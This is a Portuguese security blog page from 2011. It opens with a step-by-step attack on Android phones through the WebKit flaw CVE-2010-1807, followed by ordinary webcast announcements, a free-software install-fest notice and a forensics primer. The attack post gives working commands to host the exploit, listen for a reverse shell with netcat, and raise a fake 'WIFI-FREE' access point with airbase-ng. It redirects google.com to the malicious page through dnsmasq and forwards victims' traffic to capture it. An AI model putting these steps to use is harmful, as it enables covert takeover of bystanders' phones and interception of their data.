30 de março de 2011

Explorando celulares Android via Web com airbase-ng

Recentemente foi publicada uma vulnerabilidade no WebKit (CVE-2010-1807), utilizado pelo Safari e Chrome, que também afeta o browser dos celulares Android.

A vulnerabilidade foi descoberta por M.J. Keith, quem também publicou um exploit durante uma conferência em Houston, e logo Itzhak Avraham realizou algumas melhorias no mesmo, para dar-lhe maior grau de sucesso na exploração.

Esta vulnerabilidade afeta os celulares Android com a versão 2.1 e inferiores, e apesar da última versão 2.2 não ser afetada, nem todos os fabricantes ou operadoras obrigam seus usuários a atualizar o software.

Por exemplo, em meus testes, utilizei um Motorola Milestone com Android 2.1-update1, e apesar da versão 2.2 estar disponível há um bom tempo, apenas recentemente a Motorola começou a realizar os upgrades para o Milestone na América Latina, isso no primeiro trimestre de 2011.

Uma vergonha por parte dos fabricantes e operadoras! Lembrando que já está disponível a versão 2.3 do Android, agora em Março/2011.


Explorando o Android

Para explorar essa vulnerabilidade, o celular com Android deve acessar um site web que possua o código malicioso.

Poderíamos fazer isso na internet, ou como vamos fazer a seguir, levantar um Access Point falso para liberar o acesso à Internet para pessoas com celulares, e quando realizarem uma requisição específica de DNS, redirecionaremos à um site hospedado localmente com o código malicioso.


Preparando o Exploit

Baixamos o exploit e o deixamos no home do Apache com o nome "index.html":

# nano /var/www/index.html

[cole o conteúdo do exploit dentro desse arquivo, e salve]

# /etc/init.d/apache2 start

Nas primeiras linhas do exploit melhorado por Itzhak, podemos encontrar a possibilidade de facilmente alterar o endereço IP e a porta do shellcode:

var ip = unescape("\ua8c0\u0100"); // ip = 192.168.0.1
var port = unescape("\u3930"); //port 12345 (hex(0x3039))

Nesse caso, uma vez que a exploração tenha sucesso, será criada uma conexão reversa para o IP "192.168.0.1" na porta "12345", para a qual devemos já ter deixado em estado de escuta o netcat nessa porta:

# nc -l -p 12345 -n -vvv
listening on [any] 12345 ...


Preparando o Access Point falso

Com o que foi executado no passo anterior, já estaríamos em condição de atacar com sucesso uma vítima se tivéssemos utilizando um IP público na Internet.

Mas a ideia a seguir é levantar um Access Point falso com o airodump-ng para que as pessoas com celulares acessem o mesmo em busca de internet grátis, e quando realizarem uma requisição à um DNS específico, redirecionamos a vítima para nosso Apache com o código malicioso.

Primeiro vamos configurar o Dnsmasq, que nos vair prover o serviço de DNS e DHCP para nosso Access Point falso. Se não os tivermos instalado, podemos fazer da seguinte forma:

# apt-get install dnsmasq
# /etc/init.d/dnsmasq stop


Logo devemos nos assegurar de configurar em qual interface de rede o Dnsmasq ficará escutando, configurar o range de endereços IP que entregará às vítimas, e qual o domínio será redirecionado para nosso Apache com o exploit, que nesse caso será "google.com":

# nano /etc/dnsmasq.conf

interface=at0
dhcp-range=192.168.0.5,192.168.0.20,12h
address=/google.com/192.168.0.1

# /etc/init.d/dnsmasq start

Se tivermos internet (3G por exemplo, se estivermos em algum local público), seria uma boa idéia encaminhar todo o tráfego para que a vítima acredite que está em uma rede wireless comum, e de brinde teremos a possibilidade de capturarmos algo de seu tráfego:

# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE


Finalmente, levantamos o Access Point falso com o airbase-ng e configuramos a interface de rede "at0", criada pelo airbase-ng, com o endereço IP onde se realizará a conexão reversa:

# airbase-ng -C 30 --essid "WIFI-FREE" wlan0
# ifconfig at0 192.168.0.1 netmask 255.255.255.0 up


Nesse caso, a rede se chama "WIFI-FREE", mas podemos colocar qualquer outro nome que escolhermos.


Atacando a vítima

Por minha experiência com o Motorola Milestone, quando habilitamos a placa wireless do celular, inicia-se a detecção de redes na área e conectamos manualmente na qual desejamos, principalmente nas que estão abertas e sem criptografia. Depois da primeira vez que fazemos isso, nas vezes seguintes a conexão é automática.

Quando a vitima estiver conectada, o tráfego de rede passará normalmente até o momento em que a vítima acesse o "www.google.com", de onde será direcionada para nosso Apache e obteremos uma conexão reversa no netcat que deixamos escutando:

Linux: Explorando celulares Android via Web com airbase-ng

Uma vez que recebemos a conexão reversa, podemos executar comandos do Android como "/system/bin/id" ou "/system/bin/ps" para verificar que efetivamente podemos acessar o dispositivo.

That's all folks!

28 de março de 2011

FLISOL RJ - 09/04/2011

No próximo dia 9 de abril vai acontecer na UNIRIO - URCA a edição carioca do maior evento de divulgação de software livre da América Latina: o FLISOL (Festival Latino Americano de Instalação de Software Livre).

Durante todo o dia você poderá levar seu computador para que nossos técnicos instalem diversos softwares livres de forma gratuita e segura! Além disso, teremos uma excelente programação, com palestras e mini-cursos, para você não apenas conhecer, mas também aprender a utilizar os programas que estão revolucionando a informática no mundo todo.

Estaremos com 2 grandes salas com capacidade para 70 pessoas cada sala.
Teremos 5 mini-salas com os seguintes eventos:

  • Apache Meet (Meet da Fundação Apache).
  • Debate sobre Copyleft e Cultura Livre.
  • Workshop de Computação Gráfica.
  • Workshop de Arduino (com a ArduInRio).
  • Install Fest.
  • Debate sobre Cultura e Produção Livre.
Teremos 16 palestras com as seguintes Comunidades de Software e Hardware Livre e afins do Rio de Janeiro:


Alguns exemplos de Sistemas Operacionais que poderemos instalar gratuitamente!.

=> Podemos manter seu sistema + os seguintes (ou podemos remover e instalar, ZERANDO seu computador).

=> Podemos instalar também
  • Mozilla Firefox (navegador mais rápido e seguro que o Internet Explorer®)
  • LibreOffice (substituto livre do Microsoft® Office)
  • Lista de outros possíveis softwares, clique aqui.
=> Se você tem impressora, favor imprimir o documento de responsabilidade, clicando aqui.

Favor imprimir este documento e levar com seu equipamento.

Obs: Se você não mora no Rio de Janeiro, verifique aqui se o evento ocorrerá em sua cidade.


O que devo fazer para me preparar para as instalações?

1) Checagem de Hardware:

No Windows, vá até o Painel de Controle e escolha Sistema. Liste:

  • Placa de rede (marca, modelo, configuração)
  • Placa de vídeo (marca, modelo, configuração)
  • Placa de Som (marca, modelo, configuração)
  • CPU (Processador)
  • Memória RAM
  • Modem (marca, modelo, configuração)
  • Espaço livre em disco (mínimo de 5.0 Gb)
  • Componentes SCSI (se houver algum)

2) Backup dos dados:

Por precaução, você deve fazer uma cópia dos seus dados importantes para algum local seguro (como o computador de um amigo ou CD-ROM).

3) Desfragmentação do disco:

No Windows, para desfragmentar o disco, primeiro feche todos os programas (isto incluirá MSN, navegadores ou qualquer outro programa que estiver rodando). A seguir, clique em Iniciar -> Programas -> Acessórios -> Desfragmentador de Disco. A seguir, clique em "Iniciar" na janela que aparecer.

4) Particionamento do disco:

se você souber como fazer, faça uma partição de no mínimo 5.0 Gb. Quanto maior for essa partição, mais utilidades do Linux poderão ser instaladas. Se você não souber fazer isso, nós faremos no dia do Install Fest. Apenas irá demorar mais tempo.

Obs 1: Os custos de transporte do seu computador são de sua responsabilidade.

Obs 2: Se tiver, leve ao evento os manuais do seu hardware (para caso apareçam dúvidas a seu respeito).

Obs 3: Esteja ciente do termo de responsabilidade, e todos os passos necessários ao instalar e/ou remover um sistema operacional do seu computador.

21 de março de 2011

Webcast Tutorial: Forense Computacional com Software Livre

No dia 24/03/11 acontecerá o Webcast Tutorial: Forense Computacional com Software Livre, com Luiz Vieira.

Dentro de 4 a 5 anos é esperado que a maioria das questões judiciais envolvam a forense computacional, pois evidências digitais estarão direta ou indiretamente ligadas aos casos, como hoje estão na vida de todos nós. Porém, como em todas as novas técnicas e descobertas, o mercado está escasso de profissionais nesta área e carente de profissionais certificados em forense digital.

É maior o número de casos judiciais e investigações administrativas onde filmagens, fotos, ligações, e-mails e outras formas digitais são levantadas para melhor esclarecer a questão apresentada a ser investigada.

Tópicos que serão abordados nesta edição:

  • O que é Forense Computacional?
  • Principais desafios da Forense Computacional
  • Passos de uma Investigação
  • Análise Viva e Post Mortem
  • Distribuições Linux para Forense
  • Ferramentas Livres e Toolkits para Forense

Perguntas que serão respondidas:

  • Quantas áreas de atuação de forense digital existem?
  • Qualquer ferramenta pode ser utilizada durante um processo de investigação?
  • Quais os passos que um profissional deve seguir durante uma investigação?
  • A coleta de evidências segue sempre o mesmo padrão, seja da memória primária, seja secundária?

Sobre o palestrante:

Luiz Vieira tem 15 anos de atuação na área de TI, tendo, ao longo de sua trajetória profissional, tornado-se Especialista em Segurança da Informação e Auditoria de sistemas. Capacitado e com experiência em auditoria, teste de invasão em sistemas, redes e aplicações WEB. Desenvolve projetos de redes com topologias seguras, proteção de perímetro, hardening, implementação de sistemas de monitoramento e detecção de invasão.

Resenhista de vários livros sobre Segurança da Informação para editoras especializadas (Brasport, Ciência Moderna), articulista dos sites Imasters, VivaOLinux, SegurançaLinux e Revista Espírito Livre.

Foi palestrante durante a 11ª edição do Fisl (Fórum Internacional do Software livre) e apresentador do tutorial "Analysis of Vulnerabilities in Web Applications", durante a edição da LinuxCon Brasil2010.

Todos os Webcasts serão disponibilizados posteriormente no formato Podcast Download.

Faça sua inscrição gratuita!

Todos que fizeram inscrição receberão instruções de acesso com antecedência.


Cursos relacionados:

Segurança em Servidores Linux usando a ISO27002
Pen test: Teste de Invasão em Redes Corporativas
Investigação Forense Digital

Webcast Tutorial: Criptografia on-the-fly: segurança em tempo real

No dia 22/03/11 acontecerá o Webcast Tutorial: Criptografia on-the-fly: segurança em tempo real, com Luiz Vieira.

Com o grau de importância dado à informação atualmente, a criptografia e as ferramentas que permitem aplicar esse conceito aos ativos de uma empresa, cumprem muito bem o papel de proteger essas informações. Por conta disso, apresentaremos uma série de soluções baseadas em software livre que possibilitam termos um alto nível de proteção, sem perda de desempenho e sem comprometer a segurança.

Tópicos que serão abordados nesta edição:

  • O que é criptografia?
  • Técnicas que se utilizam de criptografia
  • Prós e Contras
  • Ferramentas livres para criptografia

Perguntas que serão respondidas:

  • O que pode acontecer se eu perder minha senha?
  • Posso criptografia apenas arquivos ou posso fazer isso com sistemas inteiros?
  • Há perda de performance com a criptografia?
  • O que as ferramentas livres tem de melhor que as soluções pagas?

Sobre o palestrante:

Luiz Vieira tem 15 anos de atuação na área de TI, tendo, ao longo de sua trajetória profissional, tornado-se Especialista em Segurança da Informação e Auditoria de sistemas. Capacitado e com experiência em auditoria, teste de invasão em sistemas, redes e aplicações WEB. Desenvolve projetos de redes com topologias seguras, proteção de perímetro, hardening, implementação de sistemas de monitoramento e detecção de invasão.

Resenhista de vários livros sobre Segurança da Informação para editoras especializadas (Brasport, Ciência Moderna), articulista dos sites Imasters, VivaOLinux, SegurançaLinux e Revista Espírito Livre.

Foi palestrante durante a 11ª edição do Fisl (Fórum Internacional do Software livre) e apresentador do tutorial "Analysis of Vulnerabilities in Web Applications", durante a edição da LinuxCon Brasil2010.

Todos os Webcasts serão disponibilizados posteriormente no formato Podcast Download.

Faça sua inscrição gratuita!

Todos que fizeram inscrição receberão instruções de acesso com antecedência.


Cursos relacionados:

Segurança em Servidores Linux usando a ISO27002
Pen test: Teste de Invasão em Redes Corporativas
Investigação Forense Digital

16 de março de 2011

Webcast Tutorial: Metasploit Framework: Software Livre para PoC de Vulnerabilidades

No dia 17/03 às 20h acontecerá o Webcast Tutorial: Metasploit Framework: Software Livre para PoC de Vulnerabilidades, com Luiz Vieira.

O framework de segurança Metasploit, é uma ferramenta muito utilizada para provas de conceito e teste de invasão, pois reúne muitos exploits e módulos auxiliares sempre em constante atualização, que permitem ao profissional de segurança testar os sistemas que serão alvo de uma auditoria ou avaliação de segurança.

Tópicos que serão abordados nesta edição:

  • Estrutura do Metasploit Framework e seus componentes
  • Metasploit Meterpreter
  • Armitage
  • Prova de Conceito com Metasploit

Perguntas que serão respondidas:

  • O que é o Metasploit?
  • Como utilizar o Metaspoit para prova de conceito?
  • Como desenvolver exploits para o Metasploit?
  • Quais as principais características do Meterpreter?

Sobre o palestrante:

Luiz Vieira tem 15 anos de atuação na área de TI, tendo, ao longo de sua trajetória profissional, tornado-se Especialista em Segurança da Informação e Auditoria de sistemas. Capacitado e com experiência em auditoria, teste de invasão em sistemas, redes e aplicações WEB. Desenvolve projetos de redes com topologias seguras, proteção de perímetro, hardening, implementação de sistemas de monitoramento e detecção de invasão.

Resenhista de vários livros sobre Segurança da Informação para editoras especializadas (Brasport, Ciência Moderna), articulista dos sites Imasters, VivaOLinux, SegurançaLinux e Revista Espírito Livre.

Foi palestrante durante a 11ª edição do Fisl (Fórum Internacional do Software livre) e japresentou o tutorial "Analysis of Vulnerabilities in Web Applications", na LinuxCon Brasil2010.

Todos os Webcasts serão disponibilizados posteriormente no formato Podcast Download.

Faça sua inscrição gratuita!

Todos que fizeram inscrição receberão instruções de acesso com antecedência.

12 de março de 2011

Grupo sobre Exploits e Vulnerabilidades

Eu e o Ronaldo Lima (http://www.crimesciberneticos.com/) estamos iniciando um grupo de discussão sobre desenvolvimento de exploits e pesquisa de vulnerabilidades, em língua portuguesa.

O grupo Exploits-Brasil é destinado a todos que se interessam pelo assunto, independentemente do nível de conhecimento de cada um.

Para se inscrever no grupo acesse esse endereço:

https://groups.google.com/group/exploits-brasil

Venha participar do grupo e ajude a divulgá-lo!

6 de março de 2011

Forense Computacional - Conceitos Iniciais - Parte 3 - Final

“A forense computacional é o equivalente ao levantamento na cena de um crime ou a autópsia da vítima ”. - James Borek

Atualmente, a maioria dos documentos existentes possuem seu equivalente no formato digital, e daqui há algum tempo, os documentos digitais dominarão qualquer tipo de negociação, autenticação, permissão ou qualquer outra ação legal.

Sem contar, que muito do que manipulamos de informação atulamente, está em formato virtual, sem equivalência do mundo físico. Por conta disso, em 4 ou 5 anos, todos os casos judiciais envolverão a análise forense computacional.

A forense computacional também pode atuar nas seguintes situações:
  • Buscar e identificar dados em um computador;
  • Recuperação de arquivos deletados, encriptados ou corrompidos em um sistema;
  • Fundamentar demissões de funcionários que desreiptam normas organizacionais;
  • Auxiliar na quebra de contratos que não são respeitados;
  • Provar fatos;
  • Fazer cumprir as leis de privacidade.

E como as evidências digitais são delicadas por natureza, é necessário um profissional qualificado e que tenha conhecimento suficiente para realizar a análise forense deum sistema comprometido, ou que possua evidências necessárias ara a comprovação de determinados fato.

E o principal objetivo do investigador forense computacional é determinar a natureza e os eventos relacionados a um crime ou ato malicioso, e localizar quem o perpetrou, seguindo um procedimento de investigação estruturado. Esse procedimento de investigação estruturado esta baseado em metodologias que defininem os passos básicos para o rumo de uma análise, permitindo que o profissional, inclusive, possa organizar seu kit personalizado de ferramentas para facilitar todo o processo.


Crime Cibernético

Um crime cibernético é definido como qualquer ato ilegal envolvendo um computador, seu sistema ou suas aplicações. E para ser tipificado como crime, o ato deve ser intencional, e não acidental.

E um crime cibernético possui três diferentes aspectos a serem analisados:
  • Ferramentas do crime
  • Alvo do crime
  • Tangente do crime

E o mesmo deve ser de duas categorias diferentes:
  • Ataque interno
  • Ataque externo

Exemplos de crimes cibernéticos

Alguns exemplos de crimes cibernéticos incluem:
  • Roubo de propriedade intelectual
  • Avaria na rede de serviço das empresas
  • Fraude financeira
  • Invasão de crackers
  • Distribuição e execução de vírus ou worm

Essa pequena lista, obviamente, não é exaustiva, mas leva em consideração as ocorrências de maior incidência.

E a motivação dos ataques podem ser as mais variadas possíveis, como as seguintes:

  • Testes, ou tentivas de aprender na prática, por script kiddies
  • Necessidade psicológica
  • Vingança ou outras razões maliciosas
  • Desejo de causar problemas para o alvo
  • Espionagem – corporativa ou governamental

Papel do Investigador

O principal objetivo do investigador forense computacional é determinar a natureza e os eventos relacionados a um crime ou ato malicioso e localizar quem o perpetrou, seguindo um procedimento de investigação estruturado.

O conhecimento necessário para realizar a investigação, atualmente está mais baseado em um conhecimento empírico do que teórico. Isso acaba sendo uma faca de dois gumes, pois para atuar como profissional, o mesmo precisa ter experiência na área; no entanto, esse mesmo profissional, apesar do conhecimento prático, muitas vezes não tem o embasamento teórico necessário para desenvolver ou seguir uma metodologia válida.

O investigador, precisa respeitar uma metodologia confiável e válida, para que o processo não sofra qualquer tipo de invalidação por conta de algum passo ou fase mal coordenada, pois isso pode colocar toda uma investigação a perder, posto que suas evidência podem ser tornar provas sem fundamentação legal, e seu relatório não será levado em consideração caso esteja envolvido em um processo judicial.

Daí a importância do investigador, participar de eventos, treinamentos e procurar pesquisar os fundamentos e técnicas dessa área de atuação para realizar os procedimentos de investigação da maneira mais correta possível.

É importante que o profissional mantenha uma conduta correta ao longo da investigação, para que todo o processo também não seja invalidado.

Alguns dos aspectos que tem correlação com sua conduta, são os seguintes:

  • A conduta profissional determina a credibilidade de uma investigação forense
  • O profissional deve demonstrar o mais alto nível de integridade ética e moral
  • Confidencialidade é uma característica essencial que todo investigador deve possuir
  • Discutir o caso investigado apenas com as pessoas que possuem permissão para tomar conhecimento do processo

Formações na área de Software Livre

Desde o início do ano, surgiu no mercado brasileiro projeto de treinamentos focados em Software Livre que achei interessante citar aqui.

O projeto denomina-se Universidade Open Your Source, liderada por profissionais da área de software livre e que trabalham com sistemas UNIX like: Solaris, Linux, FreeBSD e etc. Mas o que mais me chamou a atenção foram as ementas dos cursos oferecidos, principalmente por cobrarem um valor bem abaixo do mercado pela qualidade do que oferecem, com o objetivo de facilitar a inclusão no mercado de profissionais que não podem investir grandes somas em sua formação, mas querem cursos com um excelente nível de qualidade.

Só na área de segurança, já oferecem cursos de Segurança de Servidores e Teste de Invasão, tendo previsão de em breve oferecerem cursos de Forense Computacional, Análise de Malware e Desenvolvimento de Ferramentas de Segurança e Exploits.

Para maiores informações sobre as ementas dos cursos, acessem a página http://www.openyoursource.com/portal/?q=node/117

Conheço os profissionais que ministram os cursos, e os responsáveis pelo projeto. Justamente por isso, indico o projeto para aqueles que querem cursos EaD de altíssima qualidade, sem precisar pagar preços extorsivos.

Sucesso para todos!

4 de março de 2011

Webcast Tutorial: Teste de Invasão como Arte: Faça muito com poucas ferramentas

No dia 10/03 acontecerá o Webcast Tutorial: Teste de Invasão como Arte: Faça muito com poucas ferramentas. Esse Webcast faz parte de uma série especial, sobre segurança, que será realizada durante todo o mês de março.

Data: 10/03/2011
Horário: Das 20h às 20h30min.

Tópicos que serão abordados nesta edição:

  • Objetivos de um Teste de Invasão
  • O Teste de Invasão tradicional está morto!
  • Fases de um Teste de Invasão
  • Principais Ferramentas

Perguntas que serão respondidas nesta edição:

  • Quais as fases mais importantes de um teste de invasão?
  • Quais as principais ferramentas em um teste de invasão?
  • No que se deve dar mais atenção durante um pentest?
  • Por que fazer um teste de invasão?

Sobre o palestrante:

Luiz Vieira é Analista de Segurança, atua na área de TI desde 1995, com larga experiência em WEB, Desenvolvimento, Segurança e Linux. É analista de segurança, e trabalha com Proteção de Perímetro, Auditoria, Teste de Invasão e Forense Computacional. Atualmente é Consultor de Segurança da Informação na empresa 4Linux.

Faça sua inscrição gratuita!

Todos os Webcasts serão disponibilizados depois em forma de Podcast Download.

3 de março de 2011

Webcast gratuito sobre monitoramento integrado com OSSIM

Participe do Webcast Tutorial: Monitoramento integrado com OSSIM. O OSSIM monitora e integra mais de 100 ferramentas diferentes de monitoramento: desde SNORT à OSSEC e Nagios. Dessa maneira, ele permite monitorar desde serviços ativos à tentativas de invasão e ações maliciosas realizadas por usuários, como a varredura de um host em busca de vulnerabilidades para atacar.

Data: 03/03/2011
Horário: Das 20h às 20h30min.

Tópicos que serão abordados nesta edição:

  • Importância do Monitoramento;
  • Características do framework OSSIM;
  • Ferramentas Integradas e sua importância;
  • Compliance com normas ISO;

Perguntas que serão respondidas nesta edição

  • Como o OSSIM pode ajudar-me à monitorar minha rede?
  • Qual a importância da integração de ferramentas de monitoramento?
  • Quais as ferramentas o OSSIM utiliza?
  • O que pode ser monitorado com o OSSIM?

Sobre o palestrante:

Luiz Vieira é Analista de Segurança, atua na área de TI desde 1995, com larga experiência em WEB, Desenvolvimento, Segurança e Linux. É analista de segurança, e trabalha com Proteção de Perímetro, Auditoria, Teste de Invasão e Forense Computacional. Atualmente é Consultor de Segurança da Informação na empresa 4Linux.

Faça sua inscrição gratuita!

Os Webcasts são divulgados posteriormente em forma de Podcast Download.